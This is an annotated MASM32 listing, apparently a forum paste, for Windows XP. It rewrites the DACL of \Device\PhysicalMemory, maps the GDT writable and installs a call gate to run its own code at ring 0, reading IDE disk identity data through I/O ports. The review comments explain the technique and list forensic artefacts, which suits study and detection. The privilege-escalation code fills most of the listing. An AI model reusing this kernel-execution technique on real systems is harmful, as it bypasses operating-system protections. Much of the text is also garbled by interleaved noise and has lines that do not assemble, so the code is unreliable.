我可没这个水平
; Target: MASM32, 32-bit flat/stdcall Win32.  The code assumes a 32-bit Windows XP
; era system: \Device\PhysicalMemory openable from user mode, a kernel direct map
; starting at 80000000h and a legacy ATA controller at ports 1F0h-1F7h.
; The listing is a forum paste: the stray characters inside and after most lines
; are anti-copy noise, not source, and the forum's smiley filter also ate several
; ";P"/":P" sequences (see the notes at the affected lines).
; Security-relevant parts of this file: SetPhyscialMemorySectionCanBeWrited
; (rewrites the DACL of the \Device\PhysicalMemory section) and ExecRing0Proc
; (patches the GDT through that section and runs code at CPL 0).
; Declared but never referenced in this listing: DEBUG, HMODULE, PVOID, UNLONG,
; TCHAR, SystemModuleInformation, STATUS_ACCESS_VIOLATION,
; STATUS_INFO_LENGTH_MISMATCH and every OBJ_* constant (ExecRing0Proc stores the
; raw attribute value 240h instead).
.686p6 x+ n6 m8 i' E: m
.model flat, stdcall& T0 g! h+ L! u5 z( W+ C
option casemap :none ; case sensitive
4 N j0 u/ S# s+ j# V# H( |; #########################################################################
/ W: {* |% `! i: s1 i. Iinclude \masm32\include\windows.inc% ~' j' Q' G4 e" y
include \masm32\include\user32.inc
8 G/ I. H" a/ V; [+ | Oinclude \masm32\include\kernel32.inc. x1 k( L& H F v
include \masm32\include\advapi32.inc! e( m' J5 i& _
. h1 q5 j9 B" H
includelib \masm32\lib\user32.lib" W6 y3 f, @3 i5 u( M: L
includelib \masm32\lib\kernel32.lib
4 {" p" @, b) s1 O1 qincludelib \masm32\lib\advapi32.lib8 k4 S$ X" o( ~5 N7 e
; DEBUG is set but nothing below tests it.
DEBUG = TRUE
) e; p8 S. j% {2 P( @3 @* z4 Y- w5 I9 J: u# H: Z2 }
; Native-API types the MASM32 headers do not provide; all are plain 32-bit values.
HMODULE typedef dword! g5 V1 y- w+ ]# F7 H! K
NTSTATUS typedef dword
+ n* Y3 z+ f+ }: U5 r2 `% S( JPACL typedef dword- a- p: b. M; ~' u
PSECURITY_DESCRIPTOR typedef dword5 ~& N0 }0 Z) ]9 t {2 I
, X" x! t6 k4 Y
; OBJECT_ATTRIBUTES.Attributes flags (unused: ExecRing0Proc writes 240h directly).
OBJ_INHERIT=2 # ], Y" g3 l9 @4 ^$ Z3 f+ j! B
OBJ_PERMANENT=10h
7 D( u7 `& k* x! ^OBJ_EXCLUSIVE=20h
7 q. v) a7 h9 f( P+ x: \OBJ_CASE_INSENSITIVE=40h
2 D8 i$ d& X# f# `" |# K6 _OBJ_OPENIF=80h
8 D3 ]6 l8 q* p+ r. _OBJ_OPENLINK =100h
; NOTE(review): written as decimal 200 (no h suffix); the SDK value is 200h, which
; is also what the 240h stored by ExecRing0Proc contains.  Unused here.
! ]( W* x. p5 m2 zOBJ_KERNEL_HANDLE=200 5 i8 ^7 T/ a6 Y& T# p% F
OBJ_VALID_ATTRIBUTES=3F2h
; O) W( C1 P- K/ j" `; A4 w( i) `! I) R
; advapi32 constants used by SetPhyscialMemorySectionCanBeWrited.
SE_KERNEL_OBJECT = 6
) H/ y: c% b+ S0 q' YGRANT_ACCESS =1: _* I- x( D0 w, \& ]5 e$ s
NO_INHERITANCE =0
7 F: Q; P" p9 \: ITRUSTEE_IS_NAME=1
$ R1 E/ U' b) I9 N1 k5 o, zTRUSTEE_IS_USER=1 Z1 A7 q v+ m+ }! Q
; NTSTATUS values checked by ExecRing0Proc after ZwOpenSection.
STATUS_SUCCESS =0 3 k; ^. M. r! F" s# Z% `
STATUS_ACCESS_DENIED =0C0000022h
( }, q3 x& b9 y: i4 P( `4 J% R+ h G: U1 o; i# k, g) e1 z
STATUS_ACCESS_VIOLATION equ 0C0000005h
: A2 h+ s( {! VSTATUS_INFO_LENGTH_MISMATCH equ 0C0000004h
; NOTE(review): the value on the next line is garbled by the noise ("110 P2 ...");
; the symbol is not used anywhere in this listing.
, w- p: y8 C, _/ ` VSystemModuleInformation equ 110 P2 P0 i) I$ E W- f6 k! r5 V) ~5 c
PVOID TYPEDEF DWORD: G2 T7 m* t( Y5 t+ e. e4 h5 Q
UNLONG TYPEDEF DWORD
: \( N4 d; y, F' C" m8 TCHAR TYPEDEF BYTE
) V+ B* x i, m8 q1 \8 u3 Z- A) ^$ H4 Y/ @" h0 ^
; UNICODE_STRING as used by the native API: byte length, byte capacity, pointer
; to UTF-16 text (8 bytes).  Only the unused objName local in ExecRing0Proc is
; declared with it; the name actually passed to ZwOpenSection is the hand-laid
; objname/objnameptr pair in .data.
UNICODE_STRING struct
nLength WORD ? ;bytes in use, not characters
MaximumLength WORD ? ;bytes available in Buffer
Buffer DWORD ? ;pointer to the UTF-16 characters
UNICODE_STRING ends
; R( N1 W* _* W4 P# `' J6 z8 y
; OBJECT_ATTRIBUTES for the native API (6 dwords = 24 bytes, the "18h" that
; ExecRing0Proc stores in the nLength field of its ObjAttr array).  The
; objectAttributes local in ExecRing0Proc is declared but never used; the
; structure handed to ZwOpenSection is the ObjAttr byte array filled by hand.
; NOTE(review): on the ObjectName and SecurityQualityOfService lines the text
; after "?" was a comment ";PUNICODE_STRING" / ";PVOID" whose leading ";P" was
; eaten by the forum's smiley filter; as pasted those lines do not assemble.
OBJECT_ATTRIBUTES struct , W8 ?+ f! W# `
nLength dword ?
& i! P7 g# l/ h) W& K2 {3 z RootDirectory HANDLE ?
3 k) J" I. t$ f6 t ObjectName dword ?UNICODE_STRING 5 f J& [. y2 b* q6 y
Attributes dword ?;OBJ_* flags
- U: ^7 G% m) V: W" C3 y SecurityDescriptor dword ?; PVOID, points to a SECURITY_DESCRIPTOR
SecurityQualityOfService dword ?VOID // Points to type SECURITY_QUALITY_OF_SERVICE
% X2 [6 l ` qOBJECT_ATTRIBUTES ends ) v7 @* @; e2 x0 [0 ^; g
5 M. p, u$ |6 q( i! @% R
5 o& ~) g. ^, {5 \; \6 \' L
; TRUSTEE (advapi32): identifies the principal an EXPLICIT_ACCESS entry applies
; to.  SetPhyscialMemorySectionCanBeWrited fills it with TRUSTEE_IS_NAME /
; TRUSTEE_IS_USER and points ptstrName at the literal "CURRENT_USER".
; NOTE(review): the text after "?" on the pMultipleTrustee line was the comment
; ";PTRUSTEE" before the forum stripped its ";P"; as pasted it does not assemble.
TRUSTEE struct , g) K( `! a, [' t' r O
pMultipleTrustee dword ?TRUSTEE * h! a- a1 q/ I
MultipleTrusteeOperation dword ?; MULTIPLE_TRUSTEE_OPERATION (0 = no multiple trustee)
TrusteeForm dword ?;TRUSTEE_FORM - how ptstrName is interpreted
TrusteeType dword ?;TRUSTEE_TYPE
8 ~' C+ x7 G$ C6 \" y! H1 S ptstrName dword ?;LPTSTR - name or SID pointer, per TrusteeForm
TRUSTEE ends+ F( _8 F, K4 V! q. q
7 i+ f7 i6 m$ j: m* i0 t
; EXPLICIT_ACCESS (advapi32): one entry for SetEntriesInAcl - access mask,
; grant/deny mode, inheritance flags and the embedded TRUSTEE.  Field order and
; sizes must match the 32-bit SDK layout because the structure is passed to
; advapi32 by address.
EXPLICIT_ACCESS struct
grfAccessPermissions dword ? ;ACCESS_MASK to grant or deny
grfAccessMode dword ? ;ACCESS_MODE (GRANT_ACCESS in this file)
grfInheritance dword ? ;inheritance flags (NO_INHERITANCE in this file)
Trustee TRUSTEE <> ;embedded, not a pointer
EXPLICIT_ACCESS ends
* L! m9 N' F$ @$ Y% y6 `3 `
; MyGATE: the 8-byte x86 gate descriptor layout (offset low word, selector,
; dword-copy count, type/DPL/present byte, offset high word).  Declared only:
; ExecRing0Proc writes its call gate with raw word/dword stores instead.
MyGATE struct
 OFFSETL word ? ;bits 15..0 of the target offset
 SELECTOR word ? ;target code-segment selector
 DCOUNT byte ? ;dwords copied between stacks on a privilege change
 GTYPE byte ? ;gate type, DPL and present bit
 OFFSETH word ? ;bits 31..16 of the target offset
MyGATE ends
; IDEINFO: the first 128 words of an ATA IDENTIFY DEVICE block, 256 bytes in total.
; stIDEINFO in .data? is filled by the ring-0 code in ExecRing0Proc and read by
; main.  The three string fields are contiguous (serial at 20, firmware at 46,
; model at 54) and the ring-0 byte-swap loops rely on that adjacency.
; NOTE(review): the reader issues `rep insw` for 100h words = 512 bytes, i.e.
; twice the size of this structure; the second half lands past bReserved.
IDEINFO struct
wGenConfig WORD ? ;word 0: general configuration bits
wNumCyls WORD ? ;word 1: cylinders (shown by main)
wReserved WORD ?
wNumHeads WORD ? ;word 3: heads (shown by main)
wBytesPerTrack WORD ?
wBytesPerSector WORD ?
wSectorsPerTrack WORD ? ;word 6: sectors per track (shown by main)
wVendorUnique WORD 3 dup (?)
sSerialNumber BYTE 20 dup (?) ;words 10-19, ASCII, byte-swapped on the wire
wBufferType WORD ?
wBufferSize WORD ? ;in 512-byte units (shown by main)
wECCSize WORD ?
sFirmwareRev BYTE 8 dup (?) ;words 23-26, ASCII, byte-swapped on the wire
sModelNumber BYTE 40 dup (?) ;words 27-46, ASCII, byte-swapped on the wire
wMoreVendorUnique WORD ?
wDoubleWordIO WORD ?
wCapabilities WORD ?
wReserved1 WORD ?
wPIOTiming WORD ?
wDMATiming WORD ?
wBS WORD ?
wNumCurrentCyls WORD ?
wNumCurrentHeads WORD ?
wNumCurrentSectorsPerTrack WORD ?
dwCurrentSectorCapacity DWORD ?
wMultSectorStuff WORD ?
dwTotalAddressableSectors DWORD ?
wSingleWordDMA WORD ?
wMultiWordDMA WORD ?
bReserved BYTE 128 dup (?) ;words 64-127; words 128-255 of IDENTIFY have no room here
IDEINFO ends
P0 {! W7 z. o& W: J6 L
; Forward declarations (stdcall per .model).  The spellings "Physcial"/"Writed"
; are the identifiers as defined below and must match.
; SetPhyscialMemorySectionCanBeWrited(hSection): grants CURRENT_USER
;   SECTION_MAP_WRITE on the section's DACL.
; MiniMmGetPhysicalAddress(va): physical page address for a kernel virtual
;   address in [80000000h,0A0000000h), else 0.
& j5 W& G$ J$ J# bSetPhyscialMemorySectionCanBeWrited proto :dword- y a1 |& C7 ~0 @" _+ ]+ V( v
MiniMmGetPhysicalAddress proto :dword
9 m8 f# f" s3 h# S* M v% e9 T
; ENTERRING0: save all registers and flags, mask interrupts, clear CR0.WP
; (bit 16, mask 0FFFEFFFFh) so that supervisor writes ignore page read-only
; bits.  `mov cr0` is privileged, so the macro can only run at CPL 0.
; Not invoked anywhere in this listing - the ring-0 body in ExecRing0Proc
; neither masks interrupts nor touches CR0.
$ N# x, B( w3 C) x" j/ Z6 PENTERRING0 macro" `, y( x5 |# X+ K
pushad
9 R2 j9 p8 |3 P# C* k3 npushfd
) |- C! N0 {# [3 n" Scli
, A8 U( A: }+ c2 p. `& _mov eax,cr0 ;clear CR0.WP (bit 16): kernel writes no longer honour read-only pages
and eax,0fffeffffh {: R1 P8 T: k' y8 L( f1 R& [8 ]; ^
mov cr0,eax; write back with WP cleared
endm8 Q6 Q, s+ h& o; J4 r
9 y+ J o* f: { z; T% N
; LEAVERING0: counterpart of ENTERRING0 - set CR0.WP again, restore flags and
; registers and return with a far return.  Also not invoked in this listing.
; Note `sti` precedes `popfd`, so the saved IF value is what finally applies.
LEAVERING0 macro' x( F/ C$ p' l1 _9 i
mov eax,cr0 ;set CR0.WP (bit 16) again
or eax,10000h
" }' l6 W! L0 m' X8 Z+ xmov cr0,eax
2 u9 R$ e% W$ s& T' T2 ?sti
2 D" w4 w) H# I8 H% j! Lpopfd 9 {: |8 x& x, B& G
popad ; restores eax as well, so the CR0 value is not returned
retf, R/ O, i% K! w+ t& E
endm
4 l3 Z2 O/ h& I! V! E( E8 E5 H# s2 @9 ^+ p( P) O {5 {( _/ B
; UNICODE_STR <text>: emit <text> as little-endian UCS-2 - each source character
; followed by a zero byte - with no terminator.  Used for the
; \Device\PhysicalMemory object name in .data; the byte count is taken from an
; assembly-time $ difference, so this macro emits no length.
UNICODE_STR macro str
irpc _c,<str>
db '&_c',0 ;one 16-bit code unit per source character
endm
endm
; Uninitialised data (zero-filled at load).  Several buffers below are one byte
; larger than the field copied into them and rely on that zero byte as the
; string terminator.
' m+ \2 X9 V: ]; I9 }: q4 d$ H- a, q& q' J+ ^.data?. V7 K6 Y5 S: y- a
; `sgdt GdtLimit` in ExecRing0Proc stores 6 bytes: the 16-bit limit and then the
; 32-bit linear base, so GdtAddr must stay immediately after GdtLimit.
GdtLimit dw ?
" K2 v' ]1 F: I4 qGdtAddr dd ?
6 T6 c' z$ i, k0 r6 ]# N8 {3 l( W( A
; Physical page address of the GDT (MiniMmGetPhysicalAddress result).
mapAddr dd ?
; esp saved after the SEH frame is linked; MySEH restores it before unlinking.
/ V R2 H" v4 r! f# P, L2 R- Z: Q8 aOldEsp dd ?
& f' g) B m+ |. ^. @+ b/ l+ O( \6 I2 F. g( ?( m4 X b
; Used only by _ShowBuffer, which nothing in this listing calls.  ShowText is
; exactly 512*3 bytes and receives no NUL; the zero-filled szBuffer that follows
; it is what terminates the string MessageBoxA receives.
readed dw ?) a. H+ w R: @1 k; ?
buffer db 512 dup(?)+ \4 I0 ~3 k& N5 m
ShowText db 512*3 dup (?)
4 y. m) S' N q$ ^' r
; wsprintf output and the three NUL-terminated copies main makes of the
; fixed-width IDENTIFY strings (40/20/8 bytes + 1).
/ n3 t* Y- Y% T9 |szBuffer db 1024 dup (?)
" z% I6 D' P; z: Y h# J' rszModelNumber db 41 dup (?)5 s- U, P# j7 {% U
szSerialNumber db 21 dup (?)6 {8 k. i' m f* V- Q; o
szFirmwareRev db 9 dup (?)
- H P3 q1 _! L4 Z, N% h/ f( q' L5 O( F o) u; D: {" c/ V
; Receives the IDENTIFY DEVICE data written by `rep insw` at ring 0 (256 bytes,
; while 512 bytes are read - the excess is stored past the end of this section).
; NOTE(review): the "<>" initialiser lost its "<" in the paste.
stIDEINFO IDEINFO >, H1 k# T g2 _# ]* k; S/ L! O4 J! I
. }2 w: S/ J- a+ d( @1 \/ Q3 J
.data
; objname + objnameptr form a UNICODE_STRING by hand: Length, MaximumLength,
; then the Buffer pointer, which is stored at run time (ExecRing0Proc).
; ExecRing0Proc computes the structure's address as objnamestr-8, so the align,
; the order and the absence of padding between these four items matter.
4 m3 ]- I! Z I+ ?' v q( Qalign 43 d9 _! N! z6 t2 l
objname dw objnamestr_size,objnamestr_size+2
) ]1 ?, ~8 w2 A. z; p2 W! hobjnameptr dd 0
5 I5 x1 L s2 k: o5 Fobjnamestr equ this byte
8 o5 R9 f/ U+ t- CUNICODE_STR <\Device\PhysicalMemory>
. O2 D, b* n" |* [- oobjnamestr_size equ $-objnamestr
& V: F- N# I1 d4 F8 i; I% f; _: `- [: m: H
; User-visible strings (Chinese, kept as the author wrote them):
;   szTitle   - "IDE disk information"
;   szErrInfo - "unable to read disk information"
;   szIDEInfo - wsprintf format: cylinders, heads, sectors per track,
;               buffer size (sectors), model (%40s), serial (%20s), firmware (%8s)
szTitle db 'IDE 硬盘信息',0
5 f: `9 O6 O8 Y- J7 u. N! YszErrInfo db '无法读取硬盘信息',09 H' a. R5 o M8 B2 J% {. P9 ~
szIDEInfo db '柱面数 : %d',0dh,0ah
6 g% t1 ]9 Y+ f' Q4 b db '磁头数 : %d',0dh,0ah5 C7 n6 u6 ~" s" z
db '每道扇区数 : %d',0dh,0ah
9 g# G! | d1 w/ K) `+ s7 F: w db '缓冲大小 : %d 扇区',0dh,0ah K7 |. C& ?& m9 Z! w
db '硬盘型号 : %40s',0dh,0ah
* o) ]- N5 z: a* @( v" w3 R db '序列号 : %20s',0dh,0ah* T- z9 l' }0 ]5 t' l7 l6 c2 q' @9 g
db '版本号 : %8s',0
# K- c. f! i( e. N
; 24-byte OBJECT_ATTRIBUTES filled field by field in ExecRing0Proc.
' ~1 ^- x! o5 g$ H+ J3 r8 r0 Halign 46 _* ] @- }! l6 j+ c
ObjAttr db 24 dup (0)' } ~* c3 |; b+ }! ]% L' y
. p6 | q) W7 z0 O* V: b
; Far pointer for `call fword ptr [Callgt]`: offset (dword, stays 0) followed by
; the gate selector, written at run time.  Declared as 8 bytes; 6 are used.
Callgt dq 0 ;call gate's far pointer
; Title of the _ShowBuffer message box ("Windows XP raw disk read/write").
Caption db 'Windows XP绝对磁盘读写',0
; xlat table for the hex dump in _ShowBuffer.
4 h* u# `+ M" s+ Q! e* X- t5 gDigit db '0123456789ABCDEF',0
$ c/ a3 x' k$ |0 K8 x% Q.code @2 j \% ?5 E8 m
;-----------------------------------------------------------------------
; _ShowBuffer: show the 512 bytes in `buffer` as a hex dump in a message box.
; Writes "XX " per byte into ShowText; after every 16 bytes the trailing space
; is replaced by CR (13).  512 bytes * 3 characters fill ShowText exactly and no
; NUL is written - the zero-filled storage after ShowText terminates the text.
; Not called anywhere in this listing.
; Clobbers: eax, ecx, edx, esi, edi, ebx, `readed` (left at 0).
;-----------------------------------------------------------------------
_ShowBuffer proc
 mov [readed],512 ;bytes still to convert
 mov esi,offset buffer ;source bytes
 mov edi,offset ShowText ;destination text
 mov ebx,offset Digit ;xlat table '0'..'F'
 xor ecx,ecx ;bytes already emitted on the current line
 xor eax,eax ;upper bytes of eax must be zero before the first shr/xlat
nextByte:
 cmp [readed],0
 je dumpDone
 dec [readed]
 lodsb
 mov edx,eax ;keep the raw byte while the high nibble is converted
 shr eax,4 ;high nibble
 xlatb
 stosb
 mov eax,edx
 and eax,0fH ;low nibble
 xlatb
 stosb
 mov al,' ' ;separator
 stosb
 inc ecx
 cmp ecx,16
 jne nextByte
 mov byte ptr[edi-1],13 ;end a 16-byte line with CR instead of the space
 xor ecx,ecx
 jmp nextByte
dumpDone:
 invoke MessageBoxA,NULL,offset ShowText,offset Caption,MB_OK
 ret
_ShowBuffer endp
5 U4 i- n [, w
;-----------------------------------------------------------------------
; SetPhyscialMemorySectionCanBeWrited(hSection)
; Adds a GRANT ACE for "CURRENT_USER" with SECTION_MAP_WRITE to the DACL of the
; section behind hSection and writes it back with SetSecurityInfo.
; ExecRing0Proc calls this with a \Device\PhysicalMemory handle opened for
; READ_CONTROL|WRITE_DAC after the normal open returned STATUS_ACCESS_DENIED,
; i.e. this is the step that converts "may change the object's DACL" into
; "may map physical memory writable".  The rewritten DACL lives on the object,
; not on the handle, so a changed DACL on this section is an artefact worth
; looking for on systems where the object is reachable from user mode.
; In:  hSection - handle that carries READ_CONTROL and WRITE_DAC
; Out: eax = whatever the last advapi32 call returned (ERROR_SUCCESS on the
;      full path); the only caller in this file does not check it.
; NOTE(review): pNewDacl and pSD are never initialised before the early exits,
; so on a GetSecurityInfo/SetEntriesInAcl failure the `cmp ...,0` guards at
; OutSet test stack garbage and may hand a random value to LocalFree.
;-----------------------------------------------------------------------
SetPhyscialMemorySectionCanBeWrited proc uses ebx esi edi hSection:HANDLE 2 `6 J' T) n2 J! F3 E
local pDacl: PACL # E8 ~) y+ ~( G
; NOTE(review): the next two lines read `local pNewDacl:PACL` and
; `local pSD:PSECURITY_DESCRIPTOR` in the original; the forum's smiley filter
; removed the ":P" from each, so as pasted they declare no type.
local pNewDaclACL 4 I" A! h. n$ U
local pSD SECURITY_DESCRIPTOR
( @! p4 p0 s# d0 xlocal dwRes:DWORD ;stored once, never read
local ea:EXPLICIT_ACCESS ;the single ACE to merge
; Read the current DACL; pSD receives the descriptor that owns pDacl.
invoke GetSecurityInfo,hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, NULL,NULL, addr pDacl,NULL, addr pSD8 H) I# V7 x* s2 G# @
cmp eax,ERROR_SUCCESS
* Q0 o3 k7 ?, njz @f* x0 U. N: i( C/ g# {
jmp OutSet
4 r2 H9 S! K! T@@:0 D3 B G0 L9 C# e
mov dwRes,eax
; ACE: grant SECTION_MAP_WRITE, not inheritable, trustee given by name.
0 H: M3 L- e2 M- Y* ?4 ?! K2 bmov ea.grfAccessPermissions ,SECTION_MAP_WRITE;2
mov ea.grfAccessMode ,GRANT_ACCESS;1
mov ea.grfInheritance,NO_INHERITANCE;0
mov ea.Trustee.pMultipleTrustee,0
( z* S3 Q( S( H/ K' b- rmov ea.Trustee.MultipleTrusteeOperation,0
" D h6 A+ W \; Xmov ea.Trustee.TrusteeForm,TRUSTEE_IS_NAME;1
+ k7 y$ `$ E1 d8 jmov ea.Trustee.TrusteeType,TRUSTEE_IS_USER;1
; call/pop trick: the `call` pushes the address of the inline string, which
; `pop edx` then retrieves as the trustee name pointer.
call @f5 n% h1 P2 r' U1 g4 m: ?
db "CURRENT_USER",0+ [& M+ z2 K6 v+ _7 @3 V
@@:+ q& O* C; B- H& S
pop edx
! h: I& M# Z- n( I4 Rmov ea.Trustee.ptstrName,edx7 G8 ~4 E4 O+ Q) H# |3 B8 w6 k, G
; Merge the ACE into a copy of the existing DACL (pNewDacl is LocalAlloc'ed).
invoke SetEntriesInAcl,1,addr ea,pDacl,addr pNewDacl; }1 v& d( j L" j3 p9 u
cmp eax,ERROR_SUCCESS' [7 ~7 Y p8 ^$ H9 r3 z( T S
jz @f
, A& E6 c9 w5 I7 n3 @6 {jmp OutSet
J7 g3 J# O4 W: F" y% n- H3 ?9 D6 l@@:
; Write the new DACL onto the object (needs WRITE_DAC on hSection).
* ~2 j3 O# W+ L) f2 n& ~invoke SetSecurityInfo,hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, NULL,NULL,pNewDacl,NULL
/ a$ c/ k( Q+ J3 N! d3 I/ }& DOutSet:
; Release what advapi32 allocated; see the note above about the early exits.
% i0 d) V/ \ N- h! x" M; g6 Fcmp pSD,0
5 Q, _' i: T, ?- Wjz @f
1 e0 P6 y, f* L( Qinvoke LocalFree,pSD
/ f4 }& X: |# o. \; n0 F@@:
7 S, F' \4 H# D2 o1 u2 z& w' e; zcmp pNewDacl,06 N' ^ Y1 J; [. n; w0 V4 _9 [
jz @f
# V- X, `+ `, A* `* Y0 |% ^2 Ninvoke LocalFree,pNewDacl
7 ]8 ` X4 e1 d1 ]1 Q" j" J@@:; L5 x" t& }6 ]* A$ E, V
ret& {' ~- S+ p% F' x# c8 H$ q7 g
SetPhyscialMemorySectionCanBeWrited endp
Q+ m# M9 b' f7 X, @3 A2 V9 q" W' ~
;-----------------------------------------------------------------------
; MiniMmGetPhysicalAddress(virtualaddress)
; eax = page-aligned physical address for a kernel virtual address inside
; [80000000h,0A0000000h), else 0.  Only the 512 MB window that 32-bit XP maps
; linearly at 80000000h is handled; the page-offset bits (11..0) are dropped.
; Used by ExecRing0Proc to turn the GDT base from `sgdt` into a section offset.
; In:  virtualaddress
; Out: eax
;-----------------------------------------------------------------------
MiniMmGetPhysicalAddress proc virtualaddress:dword
 mov eax,virtualaddress
 sub eax,80000000h ;offset within the linearly mapped window
 jc notMapped ;below 80000000h
 cmp eax,20000000h
 jae notMapped ;at or above 0A0000000h
 and eax,0FFFFF000h ;page-align; bits 29..31 are already clear here
 ret
notMapped:
 xor eax,eax
 ret
MiniMmGetPhysicalAddress endp
) c- C* H- v- C4 d8 f
;-----------------------------------------------------------------------
; ExecRing0Proc()
; Runs the code between _Ring0Proc and Ring3 at CPL 0 without a driver and
; leaves the ATA IDENTIFY data in stIDEINFO.  What the code below does:
;  1. `sgdt` -> GdtLimit/GdtAddr; MiniMmGetPhysicalAddress converts the GDT
;     base to a physical page address (mapAddr).
;  2. ZwOpenSection(\Device\PhysicalMemory, MAP_READ|MAP_WRITE).  On
;     STATUS_ACCESS_DENIED the section is reopened for READ_CONTROL|WRITE_DAC,
;     SetPhyscialMemorySectionCanBeWrited rewrites its DACL, the handle is
;     closed and the open is retried.
;  3. MapViewOfFile maps GdtLimit+1 bytes at physical offset mapAddr writable.
;  4. The GDT is patched through that view: byte 0 of the null descriptor
;     becomes 0C3h (`ret`), a present DPL-3 32-bit call gate to selector 3E8h
;     with target offset = GDT linear base is written at selector 3E0h, and a
;     present DPL-0 flat 4 GB code descriptor is written at 3E8h.
;  5. `call fword ptr [Callgt]` (selector 3E3h) enters the gate at CPL 0; the
;     `ret` at the GDT base pops the pushed return address, so execution
;     continues at _Ring0Proc - the instruction after the far call - still at
;     CPL 0 and with cs = 3E8h.  The body switches to the ring-3 stack, does
;     the port I/O, then `retf`s to Ring3.
; Why it matters: whoever can obtain WRITE_DAC on \Device\PhysicalMemory (on
; the XP-era systems this targets, presumably an administrator) gets arbitrary
; kernel-mode execution.  Artefacts: a non-zero byte in the null GDT
; descriptor, a DPL-3 call gate at 3E0h and a ring-0 code segment at 3E8h
; that survive the process, plus the changed DACL on the section object.
; NOTE(review): later Windows releases no longer expose this object to user
; mode, so the sequence is specific to the XP generation.
; Out: eax = TRUE on success, 0 on failure.  ebx/esi/edi are clobbered (no
;      `uses` list); main does not depend on them.
; NOTE(review): the forum noise turned several instruction lines into
; comments (they now begin with ';'): the `xor eax,eax` before `mov ax,3e0h`,
; the second `mov ecx,10000h`, the `cmp al,58h`, the `mov edi,esi` after the
; serial-number `lea`, and the `lodsw` of the second swap loop.  They are
; left as pasted here; the comments describe the author's intent.
;-----------------------------------------------------------------------
8 }; z( E ^# E; t. ?4 }' KExecRing0Proc proc 0 R4 ]* n% d+ D Y2 f. J
local tmpSel:dword ;unused
3 x1 o4 p1 z6 Z/ ?1 A- j) H6 Wlocal setcg:dword$ l. D6 e, f, p8 |
local BaseAddress:dword ;user-mode address of the mapped GDT page(s)
9 e" u! p" d: \! Olocal NtdllMod :dword
, u* e- E% i: d# u) F: j- L% p5 vlocal hSection:HANDLE
5 ~2 N( X# ` Elocal status:NTSTATUS( \: L7 e8 H; o2 A
local objectAttributes:OBJECT_ATTRIBUTES ;unused - ObjAttr in .data is passed instead
8 D. N( @$ {+ K2 J9 X" p, ^9 Elocal objName:UNICODE_STRING6 y0 J$ Q1 }' O5 P1 S6 F1 ~
mov status,STATUS_SUCCESS; 
; GDT limit and linear base -> GdtLimit/GdtAddr (adjacent in .data?).
sgdt GdtLimit3 x/ v/ C n" J- K/ b# a9 n( P- F
invoke MiniMmGetPhysicalAddress,GdtAddr& U3 f; y1 E' t8 m" I& N h6 a8 I
mov mapAddr,eax
7 a4 a' U' E- y! ftest eax,eax5 D/ w; ?6 y% g& g. `5 O
; NOTE(review): Exit1 is a label inside main; jumping there skips this
; procedure's epilogue, so main's `pop fs:[0]` then runs on this frame.
jz Exit18 S( z w- P6 `; x# }, Q( I4 e9 o+ m
; call/pop trick: the `call` leaves the address of the inline string on the
; stack, which LoadLibraryA consumes as its argument.
call @f
. B# G7 n2 I3 ~5 i$ V7 gdb "Ntdll.dll",0, e% ^) D; \$ L9 x& ?
@@:) m& Q+ L9 A Y9 o9 S! H8 Z- @1 z
call LoadLibraryA
7 G+ e! W0 p) cmov NtdllMod,eax
$ E: M4 V" v# Y3 t1 |
; Complete the hand-laid UNICODE_STRING: Buffer = objnamestr.
, f# B4 v) ^& D) hlea edx,objnamestr [6 b0 Y, t$ O1 G9 }& i4 t
mov objnameptr,edx. _; F! h* l+ W
; Build OBJECT_ATTRIBUTES in ObjAttr: zero 24 bytes, then
; Length=24, RootDirectory=0, ObjectName=&objname, Attributes=240h.
lea edi,ObjAttr. O% [/ D7 B" P4 H+ B
and di,0fffch ;round edi down to 4 - a no-op because ObjAttr is `align 4`; it would step backwards otherwise
push edi ;edi->ObjAttr
2 M1 Y4 z+ G* \5 s% G& S! \push 24 ;sizeof OBJECT_ATTRIBUTES (18h) - not the length of the object name
3 s/ a$ x; s8 d# T( Z8 I% qpop ecx6 ~- ^2 y! V( q( s
push ecx' R' G3 W' M- B% _& N
xor eax,eax& C! B! n2 I& I, C2 f6 x
rep stosb ;zero-fill ObjAttr
pop ecx
4 X: H6 q9 u* O/ [/ r' lpop edi
$ c8 Z/ N+ n' L' W+ ?mov esi,edi
u+ ?* L# N' `: l4 xstosd+ H, A$ Z9 J+ F( @; |. A9 _! h8 O0 r0 \
mov dword ptr[esi],ecx9 h- w1 W% M. W5 l9 t5 b
stosd 6 y( @! E: K% v6 R3 o( h$ j5 | E
lea eax,[edx-8] ;eax->objname: relies on objname sitting exactly 8 bytes before objnamestr
stosd ;ObjAttr = 18h,0,0,0, 0,0,0,0, offset objname, 40h,02h,0,0, dd 2 dup(0)
mov dword ptr [edi],240h/ J! X% m# |7 [ u9 l
; Resolve ZwOpenSection from ntdll (same call/pop trick for the name).
, K& s& C- G+ e% c5 \ x5 |% Ocall @f
9 ^- k% e, }$ a& Z, G$ xdb "ZwOpenSection",0' \' B2 p% D+ A* H7 k
@@:* G; g( X u" p6 O4 {
push NtdllMod2 \# I3 m1 c7 n- I
call GetProcAddress' p+ r6 q0 b# S' {
mov ebx,eax ;ebx=ZwOpenSection, kept for the retries below
* O% ]# y6 b8 L2 }& {. m/ M: a% G6 J' e# n, |# R! G
; ZwOpenSection(&hSection, SECTION_MAP_READ|SECTION_MAP_WRITE, &ObjAttr)
push esi ;esi->ObjAttr
/ r3 E8 J1 w& j2 K4 Zpush SECTION_MAP_READ or SECTION_MAP_WRITE9 H. N0 {4 C, H& g( b
lea edi,hSection7 a4 }! j- n% H" W' Q
push edi ;edi->hSection
call eax ;ZwOpenSection(&hSection,SECTION_MAP_READ or SECTION_MAP_WRITE,ObjAttr)
! ^3 e: Q7 ]3 z8 b5 K# }mov status,eax
* ?" _9 o( ~' D$ ~+ {cmp status,STATUS_ACCESS_DENIED
! z: {/ ^5 U* d/ d) }jnz AccessPermit
; Denied: reopen with READ_CONTROL|WRITE_DAC, which is all that is needed to
; rewrite the object's DACL.
4 M+ [ O' L% h5 B/ [ Tmov eax,ebx4 U6 e2 @5 u6 L, a: Z4 l0 R
9 C: k% ]% i$ J0 P! S+ mpush esi
8 ~5 Q1 h! p% x9 dpush READ_CONTROL or WRITE_DAC
$ U6 x( ~ v4 g- }5 X8 cpush edi 9 o2 M" R+ M# b" Z/ n6 `
call eax : P# N' g* L7 @5 \
4 u s: Y. f$ \. ?/ A
; status is not checked here; a failed reopen still reaches the DACL call.
